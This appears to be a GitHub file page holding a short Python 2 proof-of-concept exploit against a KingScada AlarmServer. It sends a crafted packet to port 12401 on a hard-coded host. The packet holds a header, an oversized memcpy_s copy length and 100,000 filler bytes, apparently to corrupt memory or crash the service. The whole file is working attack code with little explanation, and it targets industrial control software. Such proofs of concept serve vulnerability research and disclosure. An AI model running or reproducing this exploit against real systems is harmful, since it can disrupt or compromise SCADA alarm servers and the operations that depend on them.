Permalink
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
29 lines (16 sloc) 488 Bytes
# coding: utf-8
import socket
import struct
print 'begin script'
#IP address of remote server
HOST = '192.168.59.128'
#Port of KingScada AlarmServer
PORT = 12401
buf = "\xff" * 100000
chunck = struct.pack('<I',0x000004d2) + struct.pack('<I',0x0000007b)
# size for memcpy_s()
copy_size = struct.pack('<I',0x00000900)
exploit = chunck + copy_size + buf
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.sendall(exploit)